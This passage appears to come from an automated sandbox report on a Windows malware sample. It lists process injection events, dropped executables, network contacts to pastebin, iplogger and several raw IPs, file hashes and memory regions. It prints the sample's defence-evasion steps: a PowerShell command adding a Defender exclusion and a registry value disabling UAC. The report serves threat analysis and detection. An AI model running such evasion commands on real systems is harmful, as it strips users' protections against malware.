PID 1816 wrote to memory of 228 N/A C:\Users\Admin\Pictures\iDuQFJcVUtwiIAfFZfcZ0wYH.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1816 wrote to memory of 228 N/A C:\Users\Admin\Pictures\iDuQFJcVUtwiIAfFZfcZ0wYH.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4948 wrote to memory of 4676 N/A C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe C:\Users\Admin\AppData\Local\Temp\u3tg.0.exe
PID 4948 wrote to memory of 4676 N/A C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe C:\Users\Admin\AppData\Local\Temp\u3tg.0.exe
PID 4948 wrote to memory of 4676 N/A C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe C:\Users\Admin\AppData\Local\Temp\u3tg.0.exe
PID 4948 wrote to memory of 2692 N/A C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe C:\Users\Admin\AppData\Local\Temp\u3tg.1.exe
PID 4948 wrote to memory of 2692 N/A C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe C:\Users\Admin\AppData\Local\Temp\u3tg.1.exe
PID 4948 wrote to memory of 2692 N/A C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe C:\Users\Admin\AppData\Local\Temp\u3tg.1.exe

System policy modification

evasion

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe

"C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe

"C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe"

C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe

"C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe"

C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe

"C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe"

C:\Users\Admin\Pictures\Sltw7XOjjA8XyWkuXpICJyEr.exe

"C:\Users\Admin\Pictures\Sltw7XOjjA8XyWkuXpICJyEr.exe"

C:\Users\Admin\Pictures\iDuQFJcVUtwiIAfFZfcZ0wYH.exe

"C:\Users\Admin\Pictures\iDuQFJcVUtwiIAfFZfcZ0wYH.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\u3tg.0.exe

"C:\Users\Admin\AppData\Local\Temp\u3tg.0.exe"

C:\Users\Admin\AppData\Local\Temp\u3tg.1.exe

"C:\Users\Admin\AppData\Local\Temp\u3tg.1.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4948 -ip 4948

C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe

"C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 1424

C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe

"C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe"

C:\Users\Admin\Pictures\Sltw7XOjjA8XyWkuXpICJyEr.exe

"C:\Users\Admin\Pictures\Sltw7XOjjA8XyWkuXpICJyEr.exe"

C:\Users\Admin\Pictures\iDuQFJcVUtwiIAfFZfcZ0wYH.exe

"C:\Users\Admin\Pictures\iDuQFJcVUtwiIAfFZfcZ0wYH.exe"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

Network

Country Destination Domain Proto
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 onlycitylink.com udp
DE 185.172.128.59:80 185.172.128.59 tcp
RU 193.233.132.234:80 tcp
US 8.8.8.8:53 realdeepai.org udp
RU 193.233.132.234:80 tcp
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 nic-it.nl udp
US 172.67.193.79:443 realdeepai.org tcp
US 172.67.193.79:443 realdeepai.org tcp
US 104.21.18.166:443 onlycitylink.com tcp
US 104.21.18.166:443 onlycitylink.com tcp
US 104.21.79.77:443 yip.su tcp
DE 138.201.79.103:80 nic-it.nl tcp
US 8.8.8.8:53 firstfirecar.com udp
US 8.8.8.8:53 jonathantwo.com udp
US 172.67.193.220:443 firstfirecar.com tcp
US 172.67.193.220:443 firstfirecar.com tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 59.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 79.193.67.172.in-addr.arpa udp
US 8.8.8.8:53 166.18.21.104.in-addr.arpa udp
US 8.8.8.8:53 77.79.21.104.in-addr.arpa udp
US 8.8.8.8:53 103.79.201.138.in-addr.arpa udp
US 172.67.176.131:443 jonathantwo.com tcp
US 172.67.176.131:443 jonathantwo.com tcp
US 8.8.8.8:53 220.193.67.172.in-addr.arpa udp
US 8.8.8.8:53 131.176.67.172.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
US 104.21.76.57:443 iplogger.com tcp
US 8.8.8.8:53 57.76.21.104.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 142.53.16.96.in-addr.arpa udp
US 8.8.8.8:53 101.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 228.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 45.87.157.20.in-addr.arpa udp
US 8.8.8.8:53 download.iolo.net udp
FR 143.244.56.49:443 download.iolo.net tcp
US 8.8.8.8:53 49.56.244.143.in-addr.arpa udp
US 20.157.87.45:80 svc.iolo.com tcp

Files

memory/2108-0-0x00007FFAE5E73000-0x00007FFAE5E75000-memory.dmp

memory/2108-1-0x0000024CC3460000-0x0000024CC346A000-memory.dmp

memory/2108-2-0x0000024CDD8D0000-0x0000024CDD92E000-memory.dmp

memory/2108-3-0x00007FFAE5E70000-0x00007FFAE6931000-memory.dmp

memory/436-4-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2552-5-0x00007FFAE5E70000-0x00007FFAE6931000-memory.dmp

memory/2552-11-0x000002670B610000-0x000002670B632000-memory.dmp

memory/2552-15-0x00007FFAE5E70000-0x00007FFAE6931000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rhx5y2uc.abm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/436-18-0x0000000074FCE000-0x0000000074FCF000-memory.dmp

memory/2552-17-0x00007FFAE5E70000-0x00007FFAE6931000-memory.dmp

C:\Users\Admin\Pictures\f2jIAYhVuI49QkFtRFqaO9KE.exe

MD5 949f191270e024e75823b32174f15754
SHA1 e2685aee44aaee2bc87888ee7c86d77bba313eae
SHA256 c3356a89f9d9962232df6a5d6dbfb42a9e2b2578b2a8d89c20b61c4c2e72c71c
SHA512 d3eea70b18938ab93b4d659a0dcb793ab1f440614763b005c9e3f9bf36e4ad49c87cd9d436d2821c34c194a6ec384c57351be4bf9164caaf269046d29c01a55a

C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe

MD5 0548c8fb97a0beb199aafecc2be8acb4
SHA1 d694cdfe61f922c4433d0549e5ff31e1c490bcab
SHA256 283a84dafeb6ce11cce61dcb92acc91f1d284aea06bf4b71024cfd1ad4f9ff46
SHA512 aa36040a2f815f2eeb65041d6a3cd3acd7c62d17f1432ae87269fbdf6162b9d72f695d86af1aba8d1223080b4b8d7deea25b423d73e5b4219bcd8111ce029cbe

C:\Users\Admin\Pictures\XcX6Z1cO9MLjIJMBclQuIu2Z.exe

MD5 77f762f953163d7639dff697104e1470
SHA1 ade9fff9ffc2d587d50c636c28e4cd8dd99548d3
SHA256 d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea
SHA512 d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

memory/2552-53-0x00007FFAE5E70000-0x00007FFAE6931000-memory.dmp

memory/2108-54-0x00007FFAE5E70000-0x00007FFAE6931000-memory.dmp

C:\Users\Admin\Pictures\RVOVCUia30HvQp3cKIR8itTN.exe

MD5 cae69d5c81409ec9162f8bd1b07533f7
SHA1 9aea0a70c0fc3b60df129f9c3d5a42a0eaafae68
SHA256 be5f5f4dc0731d21d0193287437c41a21ca8981d7970beaeecceaf3962568aab
SHA512 34977a5194cbf947deb5e0705baad4d20fd06c600580736269de96ef1ab0e5f6f6b8f3d9d8203999d926ef1c337d28f08aa92af4f86df7201714fbf5b137de69

C:\Users\Admin\Pictures\3p4RlKZEdhcS5NCHU2f3WuyU.exe

MD5 7341c4e85f4d8f7c00616b3fbbb73204
SHA1 b164950d93fd0b5fa51a6796c9cf79051a90e2cc
SHA256 12cb93fa727511eecd5a7721b71eae16305bb700a748be745bbce4ab6e65be4b
SHA512 83b519c34a9e52f526755d91fe0ff19716d1fedb9552f1e8da66ba59b45782bb173b8f926dff2e5cf0681fb6cfda485823f6aee190bc0ec804008059849e7f1d

memory/436-100-0x0000000074FCE000-0x0000000074FCF000-memory.dmp

memory/1424-101-0x0000000002BE0000-0x0000000002C16000-memory.dmp

memory/1424-102-0x00000000053F0000-0x0000000005A18000-memory.dmp

memory/1424-105-0x00000000051D0000-0x0000000005236000-memory.dmp

memory/1424-104-0x0000000005160000-0x00000000051C6000-memory.dmp

memory/1424-103-0x00000000050C0000-0x00000000050E2000-memory.dmp

memory/1424-111-0x0000000005B80000-0x0000000005ED4000-memory.dmp

memory/1424-116-0x0000000006190000-0x00000000061AE000-memory.dmp

memory/1424-117-0x00000000061D0000-0x000000000621C000-memory.dmp

memory/1424-118-0x0000000007320000-0x0000000007364000-memory.dmp

memory/1424-120-0x00000000074C0000-0x0000000007536000-memory.dmp

memory/4108-119-0x0000000000400000-0x0000000002958000-memory.dmp

memory/1424-122-0x0000000007560000-0x000000000757A000-memory.dmp

memory/1424-121-0x0000000007BC0000-0x000000000823A000-memory.dmp

memory/1424-124-0x000000006FCD0000-0x000000006FD1C000-memory.dmp

memory/1424-125-0x000000006FEA0000-0x00000000701F4000-memory.dmp

memory/1424-136-0x0000000007780000-0x0000000007823000-memory.dmp

memory/1424-135-0x0000000007760000-0x000000000777E000-memory.dmp

memory/1424-137-0x0000000007860000-0x000000000786A000-memory.dmp

memory/1424-123-0x0000000007720000-0x0000000007752000-memory.dmp

memory/1424-138-0x0000000007920000-0x00000000079B6000-memory.dmp

memory/1424-139-0x0000000007880000-0x0000000007891000-memory.dmp

memory/1424-140-0x00000000078C0000-0x00000000078CE000-memory.dmp

memory/1424-141-0x00000000078D0000-0x00000000078E4000-memory.dmp

memory/1424-142-0x00000000079C0000-0x00000000079DA000-memory.dmp

memory/1424-143-0x0000000007900000-0x0000000007908000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u3tg.0.exe

MD5 adaa7779ccd1879d9466706724ca2974
SHA1 af546b538b5362ee19131e8d30b633c817417d15
SHA256 7109bdc186a84c29affbe2882b747b8c32587ce4e8d4b39e770faa06d94431d8
SHA512 96fa1c074b4f268393f17b400711898178ce8479272d5b6ca1405568dbe63cc618b46bfb5b80a8b97a7a796f6d4b60c3727beb2b2a13d7e749b3746b736bff87

memory/3440-179-0x000000006FCD0000-0x000000006FD1C000-memory.dmp

memory/3440-191-0x000000006FEA0000-0x00000000701F4000-memory.dmp

memory/228-180-0x000000006FCD0000-0x000000006FD1C000-memory.dmp

memory/228-181-0x000000006FEA0000-0x00000000701F4000-memory.dmp

memory/2112-202-0x000000006FEA0000-0x00000000701F4000-memory.dmp

memory/2112-201-0x000000006FCD0000-0x000000006FD1C000-memory.dmp

memory/4948-214-0x0000000000400000-0x0000000002599000-memory.dmp

memory/2424-215-0x0000000000400000-0x0000000002958000-memory.dmp

memory/4840-218-0x0000000000400000-0x0000000002958000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u3tg.1.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/4108-216-0x0000000000400000-0x0000000002958000-memory.dmp

memory/228-234-0x0000000007AF0000-0x0000000007B04000-memory.dmp

memory/4108-233-0x0000000000400000-0x0000000002958000-memory.dmp

memory/4948-240-0x0000000000400000-0x0000000002599000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 a6ea7bfcd3aac150c0caef765cb52281
SHA1 037dc22c46a0eb0b9ad4c74088129e387cffe96b
SHA256 f019af2e5e74cdf13c963910500f9436c66b6f2901f5056d72f82310f20113b9
SHA512 c8d2d373b48a26cf6eec1f5cfc05819011a3fc49d863820ad07b6442dd6d5f64e27022a9e4c381eb58bf7f6b19f8e77d508734ff803073ec2fb32da9081b6f23

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 8526a6e3cf997c11fd91830a7cb77518
SHA1 d42746b1cdcf1ace37537f5e1a8f827ebb06f07c
SHA256 3a5237e4a0a905ff0cb607ee51fdb62cd20b687906d180ebab6060c68e37eb88
SHA512 72078680e1982f003f1503a0d5fb497aa045b07d32504a46b8b7d56d7e888b6f2ecd5ac3209d66a5bde29d7ab1b8de939ea28fadcb544bea8f610043d35e5703

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 0ecff8b5e01fc7ade8c4a374ad4d214d
SHA1 639fc600d0b3ddad57c6d10c29a3eabd43096ae0
SHA256 e546870e6c2f8e823627056bcd91b1a815b09ab66f8086685dbb135df7a62971
SHA512 620c7b66657c3919fc3330fa9322e2ee3a38a4e7d8841ab1b7c0aae0dfece90b91cc713cb72ed56cdff447b4fe9ffa6acdf3857b14b373f9ac197ebe53937ce0

memory/2424-249-0x0000000000400000-0x0000000002958000-memory.dmp

memory/1816-253-0x0000000000400000-0x0000000002958000-memory.dmp

memory/4840-252-0x0000000000400000-0x0000000002958000-memory.dmp

memory/2692-255-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/2692-275-0x0000000000400000-0x00000000008AD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 1850e0a8721662b8535c6292d14ad5b9
SHA1 b4f76a3e32c24a09280652cde3b03c76993a7f34
SHA256 8efa5b920028e5731cda4632e8f0f6dbdb36312b3112ca4e7abfe817d1a330d2
SHA512 8b28902bf52b0e78d27cba9fb2582309b21e662a697ad6e2e99e7d1d8fa10e646bdea1482a664cef17db2ad31f5cab197b460946784d7375e22661c95812ec9a

memory/2692-287-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/2692-288-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/3840-289-0x0000022E08AF0000-0x0000022E0C324000-memory.dmp

memory/3840-290-0x0000022E28300000-0x0000022E2840A000-memory.dmp

memory/3840-292-0x0000022E0E1D0000-0x0000022E0E1DC000-memory.dmp

memory/3840-291-0x0000022E0E1B0000-0x0000022E0E1C0000-memory.dmp

memory/3840-293-0x0000022E0E1C0000-0x0000022E0E1D4000-memory.dmp

memory/3840-294-0x0000022E0E250000-0x0000022E0E274000-memory.dmp

memory/3840-295-0x0000022E0E050000-0x0000022E0E05A000-memory.dmp

memory/3840-296-0x0000022E28150000-0x0000022E2817A000-memory.dmp

memory/3840-298-0x0000022E28600000-0x0000022E28650000-memory.dmp

memory/3840-297-0x0000022E28550000-0x0000022E28602000-memory.dmp

memory/3840-299-0x0000022E0E060000-0x0000022E0E06A000-memory.dmp

memory/3840-303-0x0000022E28650000-0x0000022E28950000-memory.dmp

memory/3840-305-0x0000022E2C2E0000-0x0000022E2C2E8000-memory.dmp

memory/3840-307-0x0000022E2C9B0000-0x0000022E2C9BE000-memory.dmp

memory/3840-306-0x0000022E2C9F0000-0x0000022E2CA28000-memory.dmp

memory/3840-308-0x0000022E2C9D0000-0x0000022E2C9D8000-memory.dmp

memory/3840-311-0x0000022E2DBC0000-0x0000022E2DBE2000-memory.dmp

memory/3840-310-0x0000022E2DB60000-0x0000022E2DBC2000-memory.dmp

memory/3840-309-0x0000022E2DB40000-0x0000022E2DB4A000-memory.dmp

memory/3840-312-0x0000022E2E110000-0x0000022E2E638000-memory.dmp

memory/3840-315-0x0000022E2D8C0000-0x0000022E2D8CC000-memory.dmp

memory/3840-316-0x0000022E2D9A0000-0x0000022E2DA16000-memory.dmp